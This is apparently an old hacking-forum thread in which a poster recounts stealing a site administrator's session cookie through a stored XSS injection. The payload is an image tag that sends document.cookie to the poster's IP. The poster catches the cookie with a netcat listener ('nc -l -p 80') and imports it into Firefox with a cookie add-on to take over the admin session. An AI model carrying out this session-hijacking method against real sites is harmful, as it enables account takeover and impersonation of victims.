cookie stolen and firefox

No explicit questions like "how do I hack xxx.com" please!
Post Reply
User avatar
glubby
forum buddy
forum buddy
Posts: 19
Joined: 04 Apr 2008, 16:00
16

cookie stolen and firefox

Post by glubby »

Hi guys,

I've got a pretty "mysterious" cookie matter. First, I wish to precise I'm working on a test platform. I found and used a XSS attack to steal a cookie. :twisted: The problem is : how to use it, so I can connect to the site with the victim identity ? The cookie has been sent to my laptop and captured with netcat. I update the cookie file of Firefox. Since then, firefox refuse to boot. 8O Isn't there any other way? :roll:

rhysh
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 767
Joined: 15 Nov 2006, 17:00
17
Contact:

Post by rhysh »

just how did u get netcat to retrieve it?

User avatar
glubby
forum buddy
forum buddy
Posts: 19
Joined: 04 Apr 2008, 16:00
16

Post by glubby »

On my machine I used : nc -l -p 80
When the victim loads the page, my javascript code add an img balise which sends me the cookie on port 80. Then I've got it on my consol in a text format.... :D

But, I don't know how to use it. :(

User avatar
glubby
forum buddy
forum buddy
Posts: 19
Joined: 04 Apr 2008, 16:00
16

Post by glubby »

well then, I found the answer on my own. To add my cookies, I used the addon "Add N Edit Cookie" :D

pseudo_opcode
cyber messiah
cyber messiah
Posts: 1201
Joined: 30 Apr 2006, 16:00
17
Location: 127.0.0.1

Post by pseudo_opcode »

and would you like to throw some light on how did you send it to your server with javascript, its interesting, due to the restrictions , you must have used your own implementation of sockets, or way to send data to your server.
I would like to hear more about it, and i m sure, others would, too

User avatar
glubby
forum buddy
forum buddy
Posts: 19
Joined: 04 Apr 2008, 16:00
16

Post by glubby »

Well, it's just an xss attack. I just put in an img balise with the source : http://@IP/document. cookie . I can't put the exact code on the forum, it's filtered. But, I'm sure you fill up the blank.
When, the administrator goes to delete my post on the forum, his browser execute the code and send to my computer the cookie's data of his session. So, I used netcat which is a "socket". So, as I explained before (nc -l -p 80) I received all the request of my victim in my console displayed in text mode. Then, all what is left was to add it to my browser and connect back to the administrator account without to enter any password.

Post Reply